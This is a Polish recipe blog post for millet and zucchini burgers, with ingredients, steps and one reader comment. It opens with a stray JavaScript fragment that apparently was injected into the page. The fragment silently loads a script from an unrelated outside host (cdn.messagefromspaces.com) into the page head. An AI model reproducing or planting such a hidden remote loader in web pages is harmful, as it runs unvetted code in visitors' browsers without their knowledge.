, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Burgery jaglane z cukinią

Wydrukuj artykuł Wydrukuj artykuł

Burgery jaglane z cukinią

Oto przepis na: obiad, śniadanie lub kolację (można podać na ciepło i na zimno, z ziemniaczkami lub w bułce…), wegetariańskie danie, pyszne przemycanie kaszy jaglanej, cukinii, otrąb i zieleniny… Mimo, że bezmięsne – Tatuś mocno zachwalał:)

Ostatnio Igor jeszcze bardziej polubił zabawę aparatem. Już nie tylko wyjmuje i wkłada baterie, bo tu jest plus, a tu minus, ale również… robi zdjęcia – i mamie też zrobił dwa, gdy burgery leżały jeszcze na papierowym ręczniku.

Oryginalny przepis znajduje się na whiteplate.blogspot.com.

A oto moja wersja z niewielkimi modyfikacjami:

Składniki:

  • 350 g cukinii
  • 100 g kaszy jaglanej
  • około 300-350 ml wody
  • 1 średniej wielkości cebula, obrana i drobno pokrojona (użyłam czerwonej)
  • 2 łyżki oleju (użyłam  oleju z pestek winogron)
  • 1 ząbek czosnku przeciśnięty przez praskę
  • 1 jajko
  • 1 łyżka mieszanych ziół (użyłam koperku i natki)
  • 2 łyżki tartej mozzarelli
  • bułka tarta i otręby żytnie – do panierowania
  • olej z pestek winogron do smażenia

Cukinię umyć i zetrzeć na tarce o średnich oczkach. Przełożyć do durszlaka, posolić 1/2 łyżeczki soli i odstawić na 30 minut, by puściła sok.
Następnie odcisnąć cukinię. Wodę zagotować, opłukaną kaszę jaglaną wsypać na wrzątek, przykryć garnek, zmniejszyć ogień i gotować ok. 30 minut, aż kasza wchłonie całą wodę.

Cebulę, zeszklić smażąc na głębokiej patelni z 2 łyżkami oleju – na średnim ogniu przez ok. 5 minut. Dodać czosnek i cukinię, chwilę podsmażyć. Następnie dodać kaszę jaglaną, zioła, doprawić solą i pieprzem do smaku.
Zdjąć z ognia, dodać jajko i utarty ser – dokładnie wymieszać. Gdy przestygnie wstawić masę do lodówki na godzinę, by masa lekko stężała.
Formować płaskie kotlety i obtoczyć w mieszance z otrąb żytnich i bułki tartej. Na patelni rozgrzać olej (użyłam oleju z pestek winogron) i kiedy będzie gorący, układać kotlety, zmniejszyć ogień i smażyć kilka minut z każdej strony. Usmażone burgery przełożyć na talerz wyłożony papierowym ręcznikiem, by pozbyć się nadmiaru tłuszczu.

Kategoria: Bez kategorii Jeden komentarz »

Jedna odpowiedź to “Burgery jaglane z cukinią”

  1. Pati

    Świetne są! Dwa moje ulubione składniki w jednym daniu – pychota!


Skomentuj...



Początek strony